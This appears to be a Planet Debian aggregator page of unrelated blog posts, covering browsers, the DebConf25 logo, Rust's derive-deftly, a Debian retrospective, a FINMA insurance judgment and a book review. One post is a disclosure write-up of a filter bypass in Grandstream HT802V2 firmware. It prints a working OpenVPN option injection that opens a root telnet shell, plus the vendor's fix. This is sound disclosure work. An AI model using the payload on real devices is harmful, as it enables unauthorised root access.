Another thing that annoyed me was YouTube videos open in new tabs not starting to play when I change to the tab. There’s a Firefox setting for allowing web sites to autoplay but there doesn’t seem to be a way to add sites to the list.
Firefox is getting vertical tabs which is a really nice feature for wide displays [3].
Firefox has a Mozilla service for syncing passwords etc. It is possible to run your own server for this, but the server is written in Rust which is difficult to package and run [4]. There are Docker images for it but I prefer to avoid Docker, generally I think that Docker is a sign of failure in software development. If you can’t develop software that can be deployed without Docker then you aren’t developing it well.
The Ungoogled Chromium project has a lot to offer for safer web browsing [5]. But the changes are invasive and it’s not included in Debian. Some of the changes like “replacing many Google web domains in the source code with non-existent alternatives ending in qjz9zk” are things that could be considered controversial. It definitely isn’t a candidate to replace the current Chromium package in Debian but might be a possibility to have as an extra browser.
The Falcon browser that is part of the KDE project looks good, but QtWebEngine doesn’t have security support in Debian. Would it be possible to provide security support for it?
Ungoogled Chromium is available in Flatpak, so I’ll test that out. But ideally it would be packaged for Debian. I’ll try building a package of it and see how that goes.
The Iridium Browser is another option [6], it seems similar in design to Ungoogled-Chromium but by different people.
13 February, 2025 11:04AM by etbe
Last November, the DebConf25 Team asked the community to help design the logo for the 25th Debian Developers' Conference and the results are in! The logo contest received 23 submissions and we thank all the 295 people who took the time to participate in the survey. There were several amazing proposals, so choosing was not easy.
We are pleased to announce that the winner of the logo survey is 'Tower with red Debian Swirl originating from blue water' (option L), by Juliana Camargo and licensed CC BY-SA 4.0.
Juliana also shared with us a bit of her motivation, creative process and inspiration when designing her logo:
The idea for this logo came from the city's landscape, the place where the medieval tower looks over the river that meets the sea, almost like guarding it. The Debian red swirl comes out of the blue water splash as a continuous stroke, and they are also the French flag colours. I tried to combine elements from the city when I was sketching in the notebook, which is an important step for me as I feel that ideas flow much more easily, but the swirl + water with the tower was the most refreshing combination, so I jumped to the computer to design it properly. The water bit was the most difficult element, and I used the Debian swirl as a base for it, so both would look consistent. The city name font is a modern calligraphy style and the overall composition is not symmetric but balanced with the different elements. I am glad that the Debian community felt represented with this logo idea!
Congratulations, Juliana, and thank you very much for your contribution to Debian!
The DebConf25 Team would like to take this opportunity to remind you that DebConf, the annual international Debian Developers Conference, needs your help. If you want to help with the DebConf 25 organization, don't hesitate to reach out to us via the #debconf-team channel on OFTC.
Furthermore, we are always looking for sponsors. DebConf is run on a non-profit basis, and all financial contributions allow us to bring together a large number of contributors from all over the globe to work collectively on Debian. Detailed information about the sponsorship opportunities is available on the DebConf 25 website.
See you in Brest!
13 February, 2025 09:00AM by Donald Norwood, Santiago Ruano Rincón, Jean–Pierre Giraud
I have a Grandstream HT802V2 running firmware 1.0.3.5 and while playing around with the VPN settings realized that the sanitization of the "Additional Options" field done for CVE-2020-5739 is not sufficient.
Before the fix for CVE-2020-5739, /etc/rc.d/init.d/openvpn
did
echo "$(nvram get 8460)" | sed 's/;/\n/g' >> ${CONF_FILE}
After the fix it does
echo "$(nvram get 8460)" | sed -e 's/;/\n/g' | sed -e '/script-security/d' -e '/^[ ]*down /d' -e '/^[ ]*up /d' -e '/^[ ]*learn-address /d' -e '/^[ ]*tls-verify /d' -e '/^[ ]*client-[dis]*connect /d' -e '/^[ ]*route-up/d' -e '/^[ ]*route-pre-down /d' -e '/^[ ]*auth-user-pass-verify /d' -e '/^[ ]*ipchange /d' >> ${CONF_FILE}
That means it deletes all lines that either contain script-security
or start with a set of options that allow command execution.
Looking at the OpenVPN configuration template (/etc/openvpn/openvpn.conf
), it already uses up
and therefor sets script-security 2
, so injecting that is unnecessary.
Thus if one can somehow inject "/bin/ash -c 'telnetd -l /bin/sh -p 1271'"
in one of the command-executing options, a reverse shell will be opened.
The filtering looks for lines that start with zero or more occurrences of a space, followed by the option name (up
, down
, etc), followed by another space.
While OpenVPN happily accepts tabs instead of spaces in the configuration file, I wasn't able to inject a tab neither via the web interface, nor via SSH/gs_config
.
However, OpenVPN also allows quoting, which is only documented for parameters, but works just well for option names too.
That means that instead of
up "/bin/ash -c 'telnetd -l /bin/sh -p 1271'"
from the original exploit by Tenable, we write
"up" "/bin/ash -c 'telnetd -l /bin/sh -p 1271'"
this still will be a valid OpenVPN configuration statement, but the filtering in /etc/rc.d/init.d/openvpn
won't catch it and the resulting OpenVPN configuration will include the exploit:
# grep -E '(up|script-security)' /etc/openvpn.conf up /etc/openvpn/openvpn.up up-restart ;group nobody script-security 2 "up" "/bin/ash -c 'telnetd -l /bin/sh -p 1271'"
And with that, once the OpenVPN connection is established, a reverse shell is spawned:
/ # uname -a Linux HT8XXV2 4.4.143 #108 SMP PREEMPT Mon May 13 18:12:49 CST 2024 armv7l GNU/Linux / # id uid=0(root) gid=0(root)
/etc/rc.d/init.d/openvpn
looks very similar, according to firmware dumpsAfter disclosing this issue to Grandstream, they have issued a new firmware release (1.0.3.10) which modifies the filtering to the following:
echo "$(nvram get 8460)" | sed -e 's/;/\n/g' \ | sed -e '/script-security/d' \ -e '/^["'\'' \f\v\r\n\t]*down["'\'' \f\v\r\n\t]/d' \ -e '/^["'\'' \f\v\r\n\t]*up["'\'' \f\v\r\n\t]/d' \ -e '/^["'\'' \f\v\r\n\t]*learn-address["'\'' \f\v\r\n\t]/d' \ -e '/^["'\'' \f\v\r\n\t]*tls-verify["'\'' \f\v\r\n\t]/d' \ -e '/^["'\'' \f\v\r\n\t]*tls-crypt-v2-verify["'\'' \f\v\r\n\t]/d' \ -e '/^["'\'' \f\v\r\n\t]*client-[dis]*connect["'\'' \f\v\r\n\t]/d' \ -e '/^["'\'' \f\v\r\n\t]*route-up["'\'' \f\v\r\n\t]/d' \ -e '/^["'\'' \f\v\r\n\t]*route-pre-down["'\'' \f\v\r\n\t]/d' \ -e '/^["'\'' \f\v\r\n\t]*auth-user-pass-verify["'\'' \f\v\r\n\t]/d' \ -e '/^["'\'' \f\v\r\n\t]*ipchange["'\'' \f\v\r\n\t]/d' >> ${CONF_FILE}
So far I was unable to inject any further commands in this block.
12 February, 2025 04:58PM by evgeni
I'm going to FOSDEM 2025!
As usual, I'll be in the Java Devroom for most of that day, which this time around is Saturday.
Please recommend me any talks!
This is my shortlist so far:
derive-deftly 1.0 is released.
derive-deftly is a template-based derive-macro facility for Rust. It has been a great success. Your codebase may benefit from it too!
Rust programmers will appreciate its power, flexibility, and consistency, compared to macro_rules
; and its convenience and simplicity, compared to proc macros.
Programmers coming to Rust from scripting languages will appreciate derive-deftly’s convenient automatic code generation, which works as a kind of compile-time introspection.
I’m often a fan of metaprogramming, including macros. They can help remove duplication and flab, which are often the enemy of correctness.
Rust has two macro systems. derive-deftly offers much of the power of the more advanced (proc_macros), while beating the simpler one (macro_rules) at its own game for ease of use.
(Side note: Rust has at least three other ways to do metaprogramming: generics; build.rs
; and, multiple module inclusion via #[path=]
. These are beyond the scope of this blog post.)
macro_rules!
macro_rules!
aka “pattern macros”, “declarative macros”, or sometimes “macros by example” are the simpler kind of Rust macro.
They involve writing a sort-of-BNF pattern-matcher, and a template which is then expanded with substitutions from the actual input. If your macro wants to accept comma-separated lists, or other simple kinds of input, this is OK. But often we want to emulate a #[derive(...)]
macro: e.g., to define code based on a struct, handling each field. Doing that with macro_rules is very awkward:
macro_rules!
’s pattern language doesn’t have a cooked way to match a data structure, so you have to hand-write a matcher for Rust syntax, in each macro. Writing such a matcher is very hard in the general case, because macro_rules
lacks features for matching important parts of Rust syntax (notably, generics). (If you really need to, there’s a horrible technique as a workaround.)
And, the invocation syntax for the macro is awkward: you must enclose the whole of the struct in my_macro! { }
. This makes it hard to apply more than one macro to the same struct, and produces rightward drift.
Enclosing the struct this way means the macro must reproduce its input - so it can have bugs where it mangles the input, perhaps subtly. This also means the reader cannot be sure precisely whether the macro modifies the struct itself. In Rust, the types and data structures are often the key places to go to understand a program, so this is a significant downside.
macro_rules
also has various other weird deficiencies too specific to list here.
Overall, compared to (say) the C preprocessor, it’s great, but programmers used to the power of Lisp macros, or (say) metaprogramming in Tcl, will quickly become frustrated.
Rust’s second macro system is much more advanced. It is a fully general system for processing and rewriting code. The macro’s implementation is Rust code, which takes the macro’s input as arguments, in the form of Rust tokens, and returns Rust tokens to be inserted into the actual program.
This approach is more similar to Common Lisp’s macros than to most other programming languages’ macros systems. It is extremely powerful, and is used to implement many very widely used and powerful facilities. In particular, proc macros can be applied to data structures with #[derive(...)]
. The macro receives the data structure, in the form of Rust tokens, and returns the code for the new implementations, functions etc.
This is used very heavily in the standard library for basic features like #[derive(Debug)]
and Clone
, and for important libraries like serde
and strum
.
But, it is a complete pain in the backside to write and maintain a proc_macro.
The Rust types and functions you deal with in your macro are very low level. You must manually handle every possible case, with runtime conditions and pattern-matching. Error handling and recovery is so nontrivial there are macro-writing libraries and even more macros to help. Unlike a Lisp codewalker, a Rust proc macro must deal with Rust’s highly complex syntax. You will probably end up dealing with syn, which is a complete Rust parsing library, separate from the compiler; syn is capable and comprehensive, but a proc macro must still contain a lot of often-intricate code.
There are build/execution environment problems. The proc_macro code can’t live with your application; you have to put the proc macros in a separate cargo package, complicating your build arrangements. The proc macro package environment is weird: you can’t test it separately, without jumping through hoops. Debugging can be awkward. Proper tests can only realistically be done with the help of complex additional tools, and will involve a pinned version of Nightly Rust.
derive-deftly lets you use a write a #[derive(...)]
macro, driven by a data structure, without wading into any of that stuff.
Your macro definition is a template in a simple syntax, with predefined $
-substitutions for the various parts of the input data structure.
Here’s a real-world example from a personal project:
define_derive_deftly! {
export UpdateWorkerReport:
impl $ttype {
pub fn update_worker_report(&self, wr: &mut WorkerReport) {
$(
${when fmeta(worker_report)}
wr.$fname = Some(self.$fname.clone()).into();
)
}
}
}
#[derive(Debug, Deftly, Clone)]
...
#[derive_deftly(UiMap, UpdateWorkerReport)]
pub struct JobRow {
...
#[deftly(worker_report)]
pub status: JobStatus,
pub processing: NoneIsEmpty<ProcessingInfo>,
#[deftly(worker_report)]
pub info: String,
pub duplicate_of: Option<JobId>,
}
This is a nice example, also, of how using a macro can avoid bugs. Implementing this update by hand without a macro would involve a lot of cut-and-paste. When doing that cut-and-paste it can be very easy to accidentally write bugs where you forget to update some parts of each of the copies:
pub fn update_worker_report(&self, wr: &mut WorkerReport) {
wr.status = Some(self.status.clone()).into();
wr.info = Some(self.status.clone()).into();
}
Spot the mistake? We copy status
to info
. Bugs like this are extremely common, and not always found by the type system. derive-deftly can make it much easier to make them impossible.
Because of the difficult and cumbersome nature of proc macros, very few projects have site-specific, special-purpose #[derive(...)]
macros.
The Arti codebase has no bespoke proc macros, across its 240kloc and 86 crates. (We did fork one upstream proc macro package to add a feature we needed.) I have only one bespoke, case-specific, proc macro amongst all of my personal Rust projects; it predates derive-deftly.
Since we have started using derive-deftly in Arti, it has become an important tool in our toolbox. We have 37 bespoke derive macros, done with derive-deftly. Of these, 9 are exported for use by downstream crates. (For comparison there are 176 macro_rules macros.)
In my most recent personal Rust project, I have 22 bespoke derive macros, done with with derive-deftly, and 19 macro_rules macros.
derive-deftly macros are easy and straightforward enough that they can be used as readily as macro_rules macros. Indeed, they are often clearer than a macro_rules macro.
derive-deftly is already highly capable, and can solve many advanced problems.
It is mature software, well tested, with excellent documentation, comprising both comprehensive reference material and the walkthrough-structured user guide.
But declaring it 1.0 doesn’t mean that it won’t improve further.
Our ticket tracker has a laundry list of possible features. We’ll sometimes be cautious about committing to these, so we’ve added a beta
feature flag, for opting in to less-stable features, so that we can prototype things without painting ourselves into a corner. And, we intend to further develop the Guide.
11 February, 2025 10:20AM by Adnan Hodzic
20 years ago, I got my Debian Developer account. I was 18 at the time, it was Shrove Tuesday and - as is customary - I was drunk when I got the email. There was so much that I did not know - which is also why the process took 1.5 years from the time I applied. I mostly only maintained a package or two. I'm still amazed that Christian Perrier and Joerg Jaspert put sufficient trust in me at that time. Nevertheless now feels like a good time for a personal reflection of my involvement in Debian.
During my studies I took on more things. In January 2008 I joined the Release
Team as an assistant, which taught me a lot of code review. I have been an Application Manager on the side.
Going to my first Debconf was really a turning point. My first one was Mar del Plata in Argentina in August 2008, when I was 21. That was quite an excitement, traveling that far from Germany for the first time. The personal connections I made there made quite the difference. It was also a big boost for motivation. I attended 8 (Argentina), 9 (Spain), 10 (New York), 11 (Bosnia and Herzegovina), 12 (Nicaragua), 13 (Switzerland), 14 (Portland), 15 (Germany), 16 (South Africa), and hopefully I'll make it to this year's in Brest. At all of them I did not see much of the countries as I prioritized all of my time focused on Debian, even skipping some of the day trips in favor of team meetings. Yet I am very grateful to the project (and to my employer) for shipping me there.
I ended up as Stable Release Manager for a while, from August 2008 - when Martin Zobel-Helas moved into DSA - until I got dropped in March 2020. I think my biggest achievements were pushing for the creation of -updates in favor of a separate volatile archive and a change of the update policy to allow for more common sense updates in the main archive vs. the very strict "breakage or security" policy we had previously. I definitely need to call out Adam D. Barratt for being the partner in crime, holding up the fort for even longer.
In 2009 I got too annoyed at the existing wanna-build team not being responsive anymore and pushed for the system to be given to a new team. I did not build it and significant contributions were done by other people (like Andreas Barth and Joachim Breitner, and later Aurelien Jarno). I mostly reworked the way the system was triggered, investigated when it broke and was around when people wanted things merged.
In the meantime I worked sys/netadmin jobs while at university, both paid and as a volunteer with the students' council. For a year or two I was the administrator of a System z mainframe IBM donated to my university. We had a mainframe course and I attended two related conferences. That's where my s390(x) interest came from, although credit for the port needs to go to Aurelien Jarno.
Since completing university in 2013 I have been working for a company for almost 12 years. Debian experience was very relevant to the job and I went on maintaining a Linux distro or two at work - before venturing off into security hardening. People in megacorps - in my humble opinion - disappear from the volunteer projects because a) they might previously have been studying and thus had a lot more time on their hands and b) the job is too similar to the volunteer work and thus the same brain cells used for work are exhausted and can't be easily reused for volunteer work. I kept maintaining a couple of things (buildds, some packages) - mostly because of a sense of commitment and responsibility, but otherwise kind of scaled down my involvement. I also felt less connected as I dropped off IRC.
Last year I finally made it to Debian events again: MiniDebconf in Berlin, where we discussed the aftermath of the xz incident, and the Debian BSP in Salzburg. I rejoined IRC using the Matrix bridge. That also rekindled my involvement, with me guiding a new DD through NM and ending up in DSA. To be honest, only in the last two or three years I felt like a (more) mature old-timer.
I have a new gig at work lined up to start soon and next to that I have sysadmining for Debian. It is pretty motivating to me that I can just get things done - something that is much harder to achieve at work due to organizational complexities. It balances out some frustration I'd otherwise have. The work is different enough to be enjoyable and the people I work with are great.
I still think the work we do in Debian is important, as much as I see a lack of appreciation in a world full of containers. We are reaping most of the benefits of standing on the shoulders of giants and of great decisions made in the past (e.g. the excellent Debian policy, but also the organizational model) that made Debian what it is today.
Given the increase in size and complexity of what Debian ships - and the somewhat dwindling resource of developer time, it would benefit us to have better processes for large-scale changes across all packages. I greatly respect the horizontal effects that are currently being driven and that suck up a lot of energy.
A lot of our infrastructure is also aging and not super well maintained. Many take it for granted that the services we have keep existing, but most are only maintained by a person or two, if even. Software stacks are aging and it is even a struggle to have all necessary packages in the next release.
Hopefully I can contribute a bit or two to these efforts in the future.
10 February, 2025 11:12AM by Philipp Kern (noreply@blogger.com)
In September 2023, Gaelle Jeanmonod at FINMA published a summary of the judgment against Parreaux, Thiébaud & Partners and their successor Justicia SA.
Madame Jeanmonod redacted the name of the company, the dates and other key details. We have recreated the unredacted judgment.
Many paragraphs are missing. The document released by Madame Jeanmonod only includes paragraphs 55 to 65 and the paragraph 69.
Some entire sentences appear to be missing and replaced with the symbol (...).
Details about the original publication on the FINMA site.
Key to symbols:
Symbol | Meaning |
---|---|
PTP | Parreaux, Thiébaud & Partners |
A | Mathieu Parreaux |
X | Parreaux, Thiébaud & Partners |
Y | Justicia SA |
Important: we recommended reading together with the full chronological history published in the original blog post by Daniel Pocock.
Provision of insurance services without autorisation
Judgment of the financial markets regulator FINMA de 2023
Summary
Following numerous reports that Parreaux, Thiébaud & Partners was operating an insurance business without authorisation, FINMA conducted investigations that led to the opening of enforcement proceedings. In fact, Parreaux, Thiébaud & Partners offered legal subscriptions for companies and individuals, which provided unlimited access to various legal services for an annual fee. In addition, Parreaux, Thiébaud & Partners also financed, in certain situations, advances on costs to pay lawyers' and court fees in the form of a loan at a 0&percnt interest rate. According to its general terms and conditions, Parreaux, Thiébaud & Partners then obtained reimbursement of this loan from the legal costs to be received at the end of the proceedings in the event of victory. In the event of loss, the balance constituted a non-repayable loan. With regard to the areas of law that were partially covered and to disputes prior to the signing of the contract, the claim was partially covered by 50&percnt.
During the procedure, FINMA appointed an investigation officer within Parreaux, Thiébaud & Partners. While the investigation officer's work had already begun, the activities of Parreaux, Thiébaud & Partners were taken over by Justicia SA in [late 2021 or early 2022]. From that point on, Parreaux, Thiébaud & Partners ceased its activities for new clients. Clients who had taken out a subscription with Parreaux, Thiébaud & Partners prior to the month of (…) were informed when renewing their subscription that their subscription had been transferred to Justicia SA. FINMA then extended the procedure and the mandate of the investigation officer to the latter. The business model of Justicia SA is almost identical to that of Parreaux, Thiébaud & Partners. The main difference concerns the terms of repayment of the loan which, according to the general terms and conditions of Justicia SA, was also repayable in the event of defeat according to the "terms agreed between the parties".
The report of the investigating officer contains in particular a detailed analysis of the activity of the two companies as well as a sample examination of client files.
By decision of [April?] 2023, FINMA held that the conditions set by case law to qualify an insurance activity were met and therefore found that Parreaux, Thiébaud & Partners, Justicia SA as well as Mathieu Parreaux, managing partner of Parreaux, Thiébaud & Partners and director of Justicia SA, carried out an insurance activity without having the required authorisation.
FINMA then found that Parreaux, Thiébaud & Partners, Justicia SA and Mathieu Parreaux had carried out insurance activities without the necessary authorisation, appointed a liquidator and ordered the immediate liquidation of the two companies. FINMA also ordered the confiscation of the liquidation proceeds in favour of the Confederation, ordered Mathieu Parreaux to refrain from carrying out, without the necessary authorisation, any activity subject to authorisation under the financial market laws and published the order to refrain for a period of 2 years on its website.
Key points from the judgment
(…)
1. Engaging in insurance transactions without the right to do so
(55) The LSA is intended in particular to protect policyholders against the risks of insolvency of insurance companies and against abuse2. Insurance companies established in Switzerland that carry out direct insurance or reinsurance activities must first obtain authorisation from FINMA and are subject to its supervision3. Where special circumstances justify it, FINMA may release from supervision an insurance company for which the insurance activity is of little economic importance or only affects a limited circle of policyholders4.
(56) In accordance with Art. 2 para. 4 LSA, it is up to the Federal Council to define the activity in Switzerland in the field of insurance. In an ordinance dated 9 November 2005, the Federal Council clarified that, regardless of the method and place of conclusion of the contract, there is an insurance activity in Switzerland when a natural or legal person domiciled in Switzerland is the policyholder or insured5. Furthermore, the LSA applies to all insurance activities of Swiss insurance companies, both for insurance activities in Switzerland and abroad. Thus, even insurance contracts concluded from Switzerland but which relate exclusively to risks located abroad with policyholders domiciled abroad are subject to the LSA. In such cases, there may also be concurrent foreign supervisory jurisdiction at the policyholder's domicile6.
(57) Since the legislature did not define the concept of insurance, the Federal Court developed five cumulative criteria to define it7: the existence of a risk, the service provided by the policyholder consisting of the payment of a premium, the insurance service, the autonomous nature of the transaction and the compensation of risks on the basis of statistical data. It is appropriate to examine below whether the services provided by Parreaux, Thiébaud & Partners and Justicia SA respectively meet the criteria of the given definition of the insurance activity.
(58) The existence of a risk: this is the central element for the qualification of insurance. The object of an insurance is always a risk or a danger, i.e. an event whose occurrence is possible but uncertain. The risk or its financial consequences are transferred from the insured to the insurer8. The uncertainty assumed by the insurer typically consists of determining whether and when the event that triggers the obligation to pay benefits occurs. The uncertainty can also result from the consequences of an event (already certain)9. In a judgment of 21 January 2011, the Federal Court, for example, acknowledged that the rental guarantee insurer who undertakes to pay the lessor the amount of the rental guarantee in place of the tenant while reserving the right to take action against the latter to obtain reimbursement of the amount paid, bears the risk of the tenant's insolvency. Thus, the risk of non-payment by the tenant is sufficient in itself to qualify this risk as an insurance risk10.
(59) In this case, the purpose of the legal subscriptions offered by Parreaux, Thiébaud & Partners / Justicia SA is the transfer of a risk from the clients to Parreaux, Thiébaud & Partners / Justicia SA. Indeed, when the client concludes a legal subscription, Parreaux, Thiébaud & Partners / Justicia SA assumes the risk of having to provide legal services and bear administrative costs, respectively lawyers' fees, court fees or expert fees incurred by legal matters. When a client reports a claim, Parreaux, Thiébaud & Partners / Justicia SA bears the risk and therefore the financial consequences arising from the need for legal assistance in question. In cases where there is a claim prior to the conclusion of the subscription, Parreaux, Thiébaud & Partners / Justicia SA will cover 50&percnt of the costs for this claim, but will continue to bear the risk for any future disputes that may arise during the term of the subscription. In this sense, Parreaux, Thiébaud & Partners / Justicia SA provide services that go beyond those offered by traditional legal protection insurance, which, however, has no influence on the existence of an uncertain risk transferred to Parreaux, Thiébaud & Partners / Justicia SA upon conclusion of the subscription. Furthermore, it was found during the investigation that, in at least one case, Parreaux, Thiébaud & Partners covered the fees without entering into a loan agreement with the client; it was therefore not provided for these advances to be repaid, contrary to what was provided for in the general terms and conditions of Parreaux, Thiébaud & Partners. Furthermore, it could not be established that the new wording of the general terms and conditions of Justicia SA providing for the repayment of the loan regardless of the outcome of the proceedings had been implemented. To date, no loan has been repaid. These elements allow us to conclude that the risk of having to pay for legal services and advances on fees are borne by Parreaux, Thiébaud & Partners and Justicia SA in place of the clients. Finally, in accordance with the case law of the Federal Court, even if the loan granted by Justicia SA is accompanied by an obligation to repay, the simple fact of bearing the risk of insolvency of its clients is sufficient to justify the classification of insurance risk.
(60) The insured's benefit (the premium) and the insurance benefit: In order to qualify a contract as an insurance contract, it is essential that the policyholder's obligation to pay the premiums is offset by an obligation on the part of the insurer to provide benefits. The insured must therefore be entitled to the insurer's benefit at the time of the occurrence of the insured event11. To date, the Federal Court has not ruled on the question of whether the promise to provide a service (assistance, advice, etc.) constitutes an insurance benefit. However, recent doctrine shows that the provision of services can also be considered as insurance benefits. Furthermore, this position is confirmed and defended by the Federal Council with regard to legal protection insurance, which it defined in Art. 161 OS as follows: "By the legal protection insurance contract, the insurance company undertakes, against payment of a premium, to reimburse the costs incurred by legal matters or to provide services in such matters"12.
(61) In this case, when a client enters into a legal subscription contract with Parreaux, Thiébaud & Partners/Justicia SA, he agrees to pay an annual premium which then allows him to have access to a catalogue of services depending on the subscription chosen. Parreaux, Thiébaud & Partners/Justicia SA undertakes for their part to provide legal assistance to the client if necessary, provided that the conditions for taking charge of the case are met. Parreaux, Thiébaud & Partners/Justicia SA leaves itself a wide margin of discretion in deciding whether it is a case of prior art or whether the case has little chance of success. In these cases, the services remain partially covered, up to 50&percnt. This approach is more generous than the practice of legal insurance companies on the market. In fact, cases of prior art are not in principle covered by legal protection insurance and certain areas are also often excluded from the range of services included in the contract.
(62) The autonomous nature of the transaction: The autonomy of the transaction is essential to the insurance business, even though the nature of an insurance transaction does not disappear simply because it is linked in the same agreement to services of another type. In order to determine whether the insurance service is presented simply as an ancillary agreement or a modality of the entire transaction, the respective importance of the two elements of the contract in the specific case must be taken into account and this must be assessed in the light of the circumstances13.
(63) In this case, the obligation for Parreaux, Thiébaud & Partners/Justicia SA to provide legal services to clients who have subscribed to the subscriptions and to bear administrative costs, respectively lawyers' fees, court fees or expert fees does not represent a commitment that would be incidental or complementary to another existing contract or to another predominant service between Parreaux, Thiébaud & Partners/Justicia SA and the clients. On the contrary, the investigation showed that the legal subscriptions offered are autonomous contracts.
(64) Risk compensation based on statistical data: Finally, the case law requires, as another characteristic of the insurance business, that the company compensates the risks assumed in accordance with the laws of statistics. The requirements set by the Federal Court for this criterion are not always formulated uniformly in judicial practice. The Federal Court does not require a correct actuarial calculation but rather risk compensation based on statistical data14. Furthermore, it has specified that it is sufficient for the risk compensation to be carried out according to the law of large numbers and according to planning based on the nature of the business15. In another judgment16, the Federal Court adopted a different approach and considered that the criterion of risk compensation based on statistical data is met when the income from the insurance business allows expenses to be covered while leaving a safety margin. Finally, in another judgment17, the High Court deduced from the fact that the products were offered to an indeterminate circle of people that the risks would be logically distributed among all customers according to the laws of statistics and large numbers18.
(65) In this case, the risks assumed by Parreaux, Thiébaud & Partners/Justicia SA are offset by the laws of statistics, at the very least by the compensation of risks according to the law of large numbers. Knowing that only a very small part of their clientele will use the services provided by Parreaux, Thiébaud & Partners/Justicia SA, the latter are counting on the fact that the income from the contributions from legal subscriptions will be used to cover the expenses incurred for clients whose cases must be handled by Parreaux, Thiébaud & Partners/Justicia SA while leaving a safety margin. Indeed, the analysis of the files revealed that when a client reports a case to Parreaux, Thiébaud & Partners/Justicia SA, the costs incurred to handle the case are at least three times higher than the contribution paid. Support in this proportion is only possible by assuming that only a few clients will need legal assistance and by ensuring that all contributions are used to cover these costs. (…).
(66) (…) The investigation, however, revealed that there is indeed an economic adequacy between the services provided to clients by Parreaux, Thiébaud & Partners / Justicia SA and the subscription fees it collects. In this way, Parreaux, Thiébaud & Partners / Justicia SA offsets its own risks, namely the costs related to the legal services it provides as well as the risk of not obtaining repayment of the loan granted to the client, by the diversification of risks that occurs when a large number of corresponding transactions are concluded, i.e. according to the law of large numbers. In view of the above, there is no doubt that the risk compensation criterion is met within the framework of the business model of Parreaux, Thiébaud & Partners / Justicia SA.
(69) (…) In view of the above, it is established that Parreaux, Thiébaud & Partners and Justicia SA have exercised, respectively exercise, an insurance activity within the meaning of Art. 2 para. 1 let. a in relation to Art. 3 para. 1 LSA and Art. 161 OS without having the required authorisation from FINMA. Indeed, upon conclusion of a subscription, clients can request legal services from Parreaux, Thiébaud & Partners/Justicia SA against payment of an annual premium. In addition to these services, the latter grant a loan to clients to cover legal costs and lawyers' fees. Although these loans are repayable "according to the agreed terms", none of these terms appear to exist in practice and no loan repayments have been recorded. Finally, the mere fact of bearing the risk of insolvency of clients is sufficient for the insurance risk criterion to be met. Furthermore, in view of the current number of legal subscription contracts held by Justicia SA, the turnover generated by its legal subscriptions and the fact that Justicia SA, and before it Parreaux, Thiébaud & Partners, offers its services to an unlimited number of persons, there are no special circumstances within the meaning of Art. 2 para. 3 LSA allowing Parreaux, Thiébaud & Partners and Justicia SA to be released from supervision under Art. 2 para. 1 LSA.
(…)
Dispositif
- Loi fédérale sur la surveillance des entreprises d'assurance (LSA; RS 961.01).
- Art. 1 al. 2 LSA.
- Art. 2 al. 1 let. a en relation avec l’art. 3 al. 1 LSA.
- Art. 2 al. 3 LSA.
- Art. 1 al. 1 let. a OS.
- HEISS/MÖNNICH, in: Hsu/Stupp (éd.), Basler Kommentar, Versicherungsaufsichtsgesetz, Bâle 2013, nos 5 s ad art. 2 LSA et les références citées.
- ATF 114 Ib 244 consid. 4.a et les références citées.
- HEISS/MÖNNICH, op. cit., nos 15 ss ad art. 2 LSA et les références citées.
- HEISS/MÖNNICH, op. cit., nos 5 s. ad art. 2 LSA et les références citées.
- TF 2C_410/2010 du 21 janvier 2011 consid. 3.2 et 4.2.
- HEISS/MÖNNICH, op. cit., nos 23 ss ad art. 2 LSA et les références citées.
- HEISS/MÖNNICH, op. cit., nos 26 ss ad art. 2 LSA et les références citées.
- HEISS/MÖNNICH, op. cit., nos 30ss ad art. 2 LSA et les références citées.
- ATF 107 Ib 54 consid. 5.
- Ibid.
- ATF 92 I 126, consid. 3.
- TF 2C_410/2010 du 21 janvier 2010 consid. 3.4.
- HEISS/MÖNNICH, op. cit., nos 34 ss ad art. 2 LSA et les références citées.
Review: The Scavenger Door, by Suzanne Palmer
Series: | Finder Chronicles #3 |
Publisher: | DAW |
Copyright: | 2021 |
ISBN: | 0-7564-1516-0 |
Format: | Kindle |
Pages: | 458 |
The Scavenger Door is a science fiction adventure and the third book of the Finder Chronicles. While each of the books of this series stand alone reasonably well, I would still read the series in order. Each book has some spoilers for the previous book.
Fergus is back on Earth following the events of Driving the Deep, at loose ends and annoying his relatives. To get him out of their hair, his cousin sends him into the Scottish hills to find a friend's missing flock of sheep. Fergus finds things professionally, but usually not livestock. It's an easy enough job, though; the lead sheep was wearing a tracker and he just has to get close enough to pick it up. The unexpected twist is also finding a metal fragment buried in a hillside that has some strange resonance with the unwanted gift that Fergus got in Finder.
Fergus's alien friend Ignatio is so alarmed by the metal fragment that he turns up in person in Fergus's cousin's bar in Scotland. Before he arrives, Fergus gets a mysteriously infuriating warning visit from alien acquaintances he does not consider friends. He has, as usual, stepped into something dangerous and complicated, and now somehow it's become his problem.
So, first, we get lots of Ignatio, who is an enthusiastic large ball of green fuzz with five limbs who mostly speaks English but does so from an odd angle. This makes me happy because I love Ignatio and his tendency to take things just a bit too literally.
SANTO'S, the sign read. Under it, in smaller letters, was CURIOSITIES AND INCONVENIENCES FOR COMMENDABLE SUMS.
"Inconveniences sound just like my thing," Fergus said. "You two want to wait in the car while I check it out?"
"Oh, no, I am not missing this," Isla said, and got out of the podcar.
"I am uncertain," Ignatio said. "I would like some curiouses, but not any inconveniences. Please proceed while I decide, and if there is also murdering or calamity or raisins, you will yell right away, yes?"
Also, if your story setup requires a partly-understood alien artifact that the protagonist can get some explanations for but not have the mystery neatly solved for them, Ignatio's explanations are perfect.
"It is a door. A doorbell. A... peephole? A key. A control light. A signal. A stop-and-go sign. A road. A bridge. A beacon. A call. A map. A channel. A way," Ignatio said. "It is a problem to explain. To say a doorkey is best, and also wrong. If put together, a path may be opened."
"And then?"
"And then the bad things on the other side, who we were trying to lock away, will be free to travel through."
Second, the thing about Palmer's writing that continues to impress me is her ability to take a standard science fiction plot, one whose variations I've read probably dozens of times before, and still make it utterly engrossing. This book is literally a fetch quest. There are a bunch of scattered fragments, Fergus has to find them and keep them from being assembled, various other people are after the same fragments, and Fergus either has to get there first or get the fragments back from them. If you haven't read this book before, you've played the video game or watched the movie. The threat is basically a Stargate SG-1 plot. And yet, this was so much fun.
The characters are great. This book leans less on found family than the last one and a bit more on actual family. When I started reading this series, Fergus felt a bit bland in the way that adventure protagonists sometimes can, but he's fleshed out nicely as the series goes along. He's not someone who tends to indulge in big emotions, but now the reader can tell that's because he's the kind of person who finds things to do in order to keep from dwelling on things he doesn't want to think about. He's unflappable in a quietly competent way while still having a backstory and emotional baggage and a rich inner life that the reader sees in glancing fragments.
